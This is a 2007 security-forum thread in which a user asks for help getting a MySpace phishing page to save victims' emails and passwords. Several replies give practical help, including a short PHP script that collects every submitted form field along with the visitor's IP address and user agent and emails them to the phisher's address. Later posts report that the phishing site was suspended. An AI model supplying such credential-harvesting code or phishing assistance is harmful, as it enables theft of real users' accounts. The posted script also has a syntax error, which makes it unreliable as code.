Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Myspace
Posted by: Anonymous User
Date: June 07, 2007 11:06AM

need some help with a phisher.......i have it on my site and it works great, but i cant get it to save the user's email and passwords to my text files. Please help me someone!

Options: ReplyQuote
Re: Myspace
Posted by: d3hydr8
Date: June 07, 2007 11:10AM

Where is the code, your site, more info?

Options: ReplyQuote
Re: Myspace
Posted by: Ghozt
Date: June 07, 2007 11:13AM

You need to create and chmod the log file.

Options: ReplyQuote
Re: Myspace
Posted by: Anonymous User
Date: June 07, 2007 03:53PM

sry
its www.freewebs.com/halo2master15
i have a password.txt file for the passwords
i have tried several different php files but none of them have worked in saving the cookies



Edited 1 time(s). Last edit at 06/07/2007 03:56PM by halo2master15.

Options: ReplyQuote
Re: Myspace
Date: June 07, 2007 05:07PM

You do realize that your page shows up with your email address in the INPUT value, and shows your login name, right? It also immediately was flagged by the fraud detection toolbar I have running.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Myspace
Posted by: Anonymous User
Date: June 07, 2007 06:08PM

yes, i know, i have to fix that, but its not hard
i am focusing on the main point of this - to get it to save passwords and usernames

Options: ReplyQuote
Re: Myspace
Date: June 07, 2007 10:43PM

whats is the PHP code you are using?

Options: ReplyQuote
Re: Myspace
Posted by: Ghozt
Date: June 08, 2007 01:07AM

Freewebs is your problem.

Options: ReplyQuote
Re: Myspace
Date: June 08, 2007 06:31AM

Simplicity is great =o). Try this...

<?php

$body = 'URI : ' . $_SERVER['REQUEST_URI'] . "\n"
      . 'UA : ' . $_SERVER['HTTP_USER_AGENT'] . "\n" 
      . 'IP : ' . $_SERVER['REMOTE_ADDR'] . "\n\n";
          
foreach ($_POST as $key => $value}
{
    $body .= $key . ' : ' . $value . "\n";
}
mail('halo2master15@yahoo.com', 'XSS Form', $body, 'From: ' . $_POST['email'] . "\r\n");

?>

Keep in mind no security checks are done in code so use at your own risk.



Edited 2 time(s). Last edit at 06/08/2007 06:32AM by CrYpTiC_MauleR.

Options: ReplyQuote
Re: Myspace
Posted by: Anonymous User
Date: June 08, 2007 07:38AM

Ehm.. better protect yourself: $body = htmlentities($body,ENT_QUOTES,'UTF-8');

cause you never know ^^

Options: ReplyQuote
Re: Myspace
Posted by: Anonymous User
Date: June 08, 2007 09:21AM

thanks, what does the code that you put in there do ronald, a little confused on that part

Options: ReplyQuote
Re: Myspace
Date: June 08, 2007 11:36AM

it makes the contents of $body safer. http://www.php.net/manual/en/function.htmlentities.php

Options: ReplyQuote
Re: Myspace
Posted by: Anonymous User
Date: June 08, 2007 09:22PM

weird. i cant even sign into my myspace normally.........and now it says my email isnt valid.......but my myspace page is still there

Options: ReplyQuote
Re: Myspace
Posted by: banshee
Date: July 06, 2007 03:20PM

Yes, when you go phishing you should be sure your site isn't vulnerable to casual users. Someone probably hacked you. It's always fun to hack the guy who's trying to phish you. :-)

Options: ReplyQuote
Re: Myspace
Posted by: anathema
Date: July 07, 2007 03:03AM

" This Site is Frozen
Visiting the site?

This site is currently suspended as it is under investigation for potential violations of our Terms of Service. This does not necessarily mean that the site is in violation; some abuse notifications require this action due to the nature of the potential violation.
Are you the site owner?

Your site is frozen due to potential violations of our Terms of Service.
An Email was sent to your account Email address notifying you of the violation. If you did not receive this notification, please check your spam mailbox, as the notification may have been directed there."

Now taken down.

Options: ReplyQuote
Re: Myspace
Posted by: BlahBlah
Date: July 10, 2007 06:34AM

PHP doesn't even work on FreeWebs unless you pay anyway...

Options: ReplyQuote


Sorry, only registered users may post in this forum.